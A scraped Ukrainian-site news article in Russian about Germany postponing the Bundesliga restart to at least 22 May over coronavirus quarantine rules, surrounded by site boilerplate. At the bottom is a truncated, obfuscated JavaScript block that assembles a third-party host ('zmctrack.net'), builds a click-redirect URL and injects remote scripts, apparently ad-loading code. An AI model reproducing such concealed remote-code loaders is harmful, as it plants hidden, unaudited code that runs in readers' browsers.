Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игре

Рестарт сезона немецкой Бундеслиги произойдет не раньше 22 мая

Еще вчера ожидалось, что Германия станет первой, кому разрешат возобновить чемпионат. Несмотря на пандемию коронавируса, спортивные мероприятия пытаются вернуться на арены, хотя, как видим, это не так просто. Клубы Бундеслиги начали тренировки еще в первой половине апреля, а дать рестарт сезону 2019/2020 собирались 9 мая. Правда, затем возобновление чемпионата перенесли на 15 мая.

Однако сегодня на заседании немецкого правительства канцлер Ангела Меркель отложила продолжение чемпионата, как минимум, до 22 мая. Об этом сообщает британское издание Daily Mail со ссылкой на свои источники. Причиной второго переноса стало требование ко всем футболистам лиги пройти двухнедельный карантин. Тем более во вторник в "Боруссии" из Менхенгладбаха нашли двоих с коронавирусом.

А перед этим в понедельник появилась информация, что игроки и сотрудники чемпионата Германии в общей сложности сдали 1724 теста, 10 из которых показали положительный результат. Немецкие власти боятся спровоцировать новую волну коронавируса, поэтому решили перестраховаться.

Реклама

Между тем, "Бавария" хочет забрать у "Манчестер Сити" молодого таланта, который ссорился с Гвардиолой.

Смотрите, как лидер Бундеслиги, "Бавария", громила в Лиге чемпионов "Челси"

Все подробности в спецтеме Коронавирус

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

карантин
сезон
возвращение
чемпионат Германии
коронавирус
Канцлер Германии
Бундеслига

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игре«Анита-бомбита»: после развода с Артемом Кравцом его бывшую жену тут же позвали замужФутбол 	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игреПереворот в футболе: из-за коронавируса ФИФА заставит весь мир играть, как МилевскийФутбол 	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игреГолая госпожа: жена бывшего футболиста «Динамо» предстала в новом откровенном образеФутбол 	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игреЛегкие деньги на коронавирусе: знаменитый тренер «забанил» бонус, который свалился на его головуФутбол 	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игре«В Киеве – не строгий карантин»: земляк Месси из «Динамо» – о ситуации в украинской столицеФутбол 	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игреЖена бывшей звезды «Динамо» блеснула актерскими способностями в разговоре с ЗеленскимФутбол

Новости партнеров

Загрузка…

загрузка…

	Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игре

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “Да что ж такое! Канцлер Германии вновь отложила возвращение футболистов к игре”